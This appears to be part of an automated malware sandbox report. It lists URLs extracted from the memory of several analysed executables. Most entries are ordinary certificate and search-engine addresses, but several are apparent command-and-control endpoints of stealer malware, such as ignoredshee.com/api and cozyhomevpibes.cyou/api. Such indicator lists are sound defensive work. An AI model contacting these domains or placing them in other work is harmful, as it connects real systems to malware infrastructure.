Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 487dac876e.exe, 00000009.00000002.2346927769.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, 487dac876e.exe, 00000009.00000000.2337200222.0000000000409000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000027.00000002.2954989748.0000000006144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000027.00000002.2855877869.0000000004D05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micro=
Source: powershell.exe, 00000027.00000002.2855877869.0000000004D05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2855877869.0000000005366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000027.00000002.2855877869.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.2855877869.0000000004D05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2855877869.0000000005366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000027.00000002.2855877869.0000000004D05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Macromedia.com, 00000016.00000000.2395706566.00000000000E5000.00000002.00000001.01000000.0000000E.sdmp, Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, AchillesGuard.com, 00000020.00000000.2430568465.00000000010A5000.00000002.00000001.01000000.00000013.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000027.00000002.2855877869.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBkq
Source: loqVSeJ.exe, 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: loqVSeJ.exe, 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2931860537.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2943667526.000000000546D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=
Source: dfd80aba08.exe, 00000007.00000003.2328050245.0000000005C71000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2931860537.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2943667526.000000000546D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dfd80aba08.exe, 00000007.00000003.2328050245.0000000005C71000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2931860537.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2943667526.000000000546D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000027.00000002.2954989748.0000000006144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.2954989748.0000000006144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.2954989748.0000000006144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: e2b0a87ceb.exe, 00000017.00000002.2619263668.000000000161C000.00000004.00000020.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000017.00000002.2610627222.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou/
Source: e2b0a87ceb.exe, 00000017.00000002.2619263668.000000000161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou/7
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000017.00000002.2610627222.0000000001592000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou/api
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou/api9
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.0000000001592000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou/apiP
Source: e2b0a87ceb.exe, 00000017.00000002.2619263668.000000000161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou/bu
Source: e2b0a87ceb.exe, 00000017.00000002.2619263668.000000000161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou/bu9N
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cozyhomevpibes.cyou:443/api
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Bjkm5hE.exe, 0000002B.00000003.2743789282.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com
Source: Bjkm5hE.exe, 0000002B.00000003.2728784820.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2745240367.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com-?
Source: Bjkm5hE.exe, 0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2745240367.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com/
Source: Bjkm5hE.exe, 0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2745240367.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com/)
Source: Bjkm5hE.exe, 0000002B.00000003.2728784820.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2745240367.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com/i
Source: Bjkm5hE.exe, 0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com/l
Source: Bjkm5hE.exe, 0000002B.00000003.2728784820.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com/s
Source: Bjkm5hE.exe, 0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.com/v
Source: Bjkm5hE.exe, 0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2745240367.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.comN
Source: Bjkm5hE.exe, 0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ffbrowse.comR
Source: powershell.exe, 00000027.00000002.2855877869.0000000004D05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: dfd80aba08.exe, 00000023.00000003.2902748543.000000000590B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/
Source: dfd80aba08.exe, 00000023.00000003.2968108873.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/)
Source: dfd80aba08.exe, 00000023.00000003.2747626819.0000000005908000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2757425599.0000000005908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/C
Source: dfd80aba08.exe, 00000023.00000003.2683460056.0000000005908000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2697043078.000000000590A000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2728516996.000000000590B000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2682609095.0000000005908000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2716461967.000000000590B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/P
Source: dfd80aba08.exe, 00000023.00000003.2813875464.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2683460056.0000000005908000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2941440162.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2976676522.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2682609095.0000000005908000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2684221793.000000000590E000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2747626819.000000000590F000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2697043078.000000000590F000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000590F000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2940860310.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/api
Source: dfd80aba08.exe, 00000023.00000003.2800858892.00000000011D1000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2791317402.00000000011D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apihfDk
Source: dfd80aba08.exe, 00000023.00000003.2747626819.000000000590F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apil
Source: dfd80aba08.exe, 00000007.00000003.2308430523.0000000005C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apiu
Source: dfd80aba08.exe, 00000023.00000003.2941440162.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2976676522.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2940860310.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/es
Source: dfd80aba08.exe, 00000007.00000003.2310873047.0000000001589000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2308505301.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/fs
Source: dfd80aba08.exe, 00000007.00000003.2253649019.0000000001523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/h3
Source: dfd80aba08.exe, 00000007.00000003.2308505301.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/icatio6;
Source: dfd80aba08.exe, 00000023.00000003.2813875464.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/msV
Source: dfd80aba08.exe, 00000007.00000003.2351542759.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2813875464.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/p
Source: dfd80aba08.exe, 00000023.00000003.2941440162.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2940860310.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/te
Source: dfd80aba08.exe, 00000007.00000003.2371724718.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2416001988.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2351542759.00000000015A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/te6;
Source: dfd80aba08.exe, 00000023.00000003.2941440162.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2976676522.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2940860310.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/vo
Source: dfd80aba08.exe, 00000023.00000003.2941440162.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2976676522.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2940860310.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/vo&
Source: dfd80aba08.exe, 00000007.00000003.2310873047.0000000001589000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2308505301.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com:443/api2
